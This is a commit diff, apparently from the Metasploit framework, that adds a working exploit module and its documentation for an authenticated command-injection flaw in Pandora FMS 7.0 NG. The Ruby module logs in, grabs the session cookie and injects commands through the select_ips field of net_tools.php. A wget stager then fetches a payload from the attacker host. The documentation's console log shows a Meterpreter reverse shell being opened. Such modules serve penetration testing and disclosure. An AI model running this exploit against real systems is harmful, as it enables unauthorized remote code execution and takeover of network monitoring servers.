Land #13098, add Pandora FMS module

2024-10-02 07:40:19 +02:00 · 2020-04-06 11:42:24 -05:00 · 2020-04-06 11:42:24 -05:00 · 7934d1de09
commit 7934d1de09
parent 62dd03c348 a3c07b7cc1
2 changed files with 219 additions and 0 deletions
--- a/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md
+++ b/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md
@ -0,0 +1,77 @@
+## Vulnerable Application
+
+Pandora FMS (for Pandora Flexible Monitoring System) is software for
+monitoring computer networks. Pandora FMS allows monitoring in a visual
+way the status and performance of several parameters from different
+operating systems, servers, applications and hardware systems such
+as firewalls, proxies, databases, web servers or routers.
+
+This module exploits a vulnerability found in Pandora FMS 7.0 NG and lower.
+The vulnerability exists on the `net_tools.php` component, due to the insecure
+usage of the `system()` PHP function.
+
+This module has been tested with [Pandora FMS 7.0 NG](https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/Final/Pandora_FMS_7.0_NG_VmWare_ovf.zip/download)
+
+## Verification Steps
+
+Launch metasploit and set the appropriate options:
+
+1.  Start `msfconsole`
+2. `use exploit/linux/http/pandora_ping_cmd_exec`
+3. `set RHOSTS <rhosts>`
+4. `set LHOST <lhost>`
+5. `set USERNAME <username>`
+6. `set PASSWORD <password>`
+7. `exploit`
+
+## Options
+
+  **USERNAME**
+
+  The username for Pandora FMS.
+
+  **PASSWORD**
+
+  The password for Pandora FMS.
+
+
+## Setup
+
+https://pandorafms.com/docs/index.php?title=Pandora:Documentation_en:Installing
+
+## Scenarios
+
+ Tested Pandora FMS 7.0 NG on CentOS 7.3.1611
+
+```
+msf5 > use exploit/linux/http/pandora_ping_cmd_exec
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.215.128
+RHOSTS => 192.168.215.128
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.1.12
+RHOSTS => 192.168.1.12
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > set LHOST 192.168.1.5
+LHOST => 192.168.1.5
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > set USERNAME admin
+USERNAME => admin
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > set PASSWORD pandora
+PASSWORD => pandora
+msf5 exploit(linux/http/pandora_ping_cmd_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.5:4444
+[*] Exploiting...
+[*] Using URL: http://0.0.0.0:8080/ksdtisFA
+[*] Local IP: http://192.168.1.5:8080/ksdtisFA
+[*] Attempting to authenticate using (admin:pandora)
+[+] Successfully authenticated
+[*] Attempting to retrieve session cookie
+[+] Successfully retrieved session cookie: PHPSESSID=knoo75fs75l00ec74atu8ic3d0; clippy=deleted; clippy=deleted;
+[*] Client 192.168.1.12 (Wget/1.14 (linux-gnu)) requested /ksdtisFA
+[*] Sending payload to 192.168.1.12 (Wget/1.14 (linux-gnu))
+[*] Sending stage (989416 bytes) to 192.168.1.12
+[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.12:54784) at 2020-03-09 15:38:25 +0300
+
+[*] Command Stager progress - 131.25% done (147/112 bytes)
+[*] Server stopped.
+
+meterpreter >
+```
--- a/modules/exploits/linux/http/pandora_ping_cmd_exec.rb
+++ b/modules/exploits/linux/http/pandora_ping_cmd_exec.rb
@ -0,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Pandora FMS Ping Authenticated Remote Code Execution',
+      'Description'     => %q{
+        This module exploits a vulnerability found in Pandora FMS 7.0NG and lower.
+        net_tools.php in Pandora FMS 7.0NG allows remote attackers to execute arbitrary OS commands.
+      },
+      'Author'          =>
+        [
+          'Onur ER <onur@onurer.net>' # Vulnerability discovery and Metasploit module
+        ],
+      'DisclosureDate'  => '2020-03-09',
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'linux',
+      'Arch'            => [ARCH_X86, ARCH_X64],
+      'Privileged'      => false,
+      'Targets'         =>
+        [
+          ['Automatic Target', {}]
+        ],
+      'DefaultOptions'  =>
+        {
+          'Payload' => 'linux/x86/meterpreter/reverse_tcp'
+        },
+      'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']),
+        OptString.new('USERNAME', [true, 'The username to authenticate with']),
+        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(target_uri, 'index.php')
+    })
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless res.body =~ /Pandora/i
+      return CheckCode::Safe
+    end
+
+    pandora_version = res.body.scan(/<div id="ver_num">v(.*?)<\/div>/).flatten.first
+    version = Gem::Version.new(pandora_version)
+
+    print_status("Pandora FMS version #{version}") if version
+
+    if Gem::Version.new(version) <= Gem::Version.new('7.0NG')
+      return Exploit::CheckCode::Appears
+    end
+
+    CheckCode::Detected
+  end
+
+  def authenticate
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri, 'index.php'),
+      'vars_get'  => {
+        'login'   => '1'
+      },
+      'vars_post' => {
+        'nick'          => datastore['USERNAME'],
+        'pass'          => datastore['PASSWORD'],
+        'login_button'  => 'Login'
+      }
+    })
+
+    return auth_succeeded?(res)
+  end
+
+  def auth_succeeded?(res)
+    unless res && res.code == 200 && res.body.include?('Welcome to Pandora FMS')
+      print_error('Authentication failed!')
+      return false
+    end
+    print_good('Successfully authenticated')
+    print_status('Attempting to retrieve session cookie')
+    @cookie = res.get_cookies
+    unless @cookie.include?('PHPSESSID')
+      print_error('Error retrieving cookie!')
+      return false
+    end
+    print_good("Successfully retrieved session cookie: #{@cookie}")
+    true
+  end
+
+  def exploit
+    print_status('Exploiting...')
+    execute_cmdstager(flavor: :wget, nospace: true)
+  end
+
+  def execute_command(cmd, opts = {})
+    print_status("Attempting to authenticate using (#{datastore['USERNAME']}:#{datastore['PASSWORD']})")
+    auth = authenticate
+    unless auth
+      fail_with Failure::NoAccess, 'Please provide a valid username and password.'
+    end
+
+    id_agente = 1
+    while !session_created? && id_agente <= 10
+      send_request_cgi({
+        'method'    => 'POST',
+        'uri'       => normalize_uri(target_uri, 'index.php'),
+        'cookie'    => @cookie,
+        'vars_get'  => {
+          'sec'           => 'estado',
+          'sec2'          => 'operation/agentes/ver_agente',
+          'tab'           => 'extension',
+          'id_agente'     => "#{id_agente}",
+          'id_extension'  => 'network_tools'
+        },
+        'vars_post' => {
+          'operation'     => '2',
+          'select_ips'    => ";#{cmd}",
+          'community'     => 'public',
+          'submit'        => 'Execute'
+        }
+      })
+
+      id_agente += 1
+    end
+  end
+end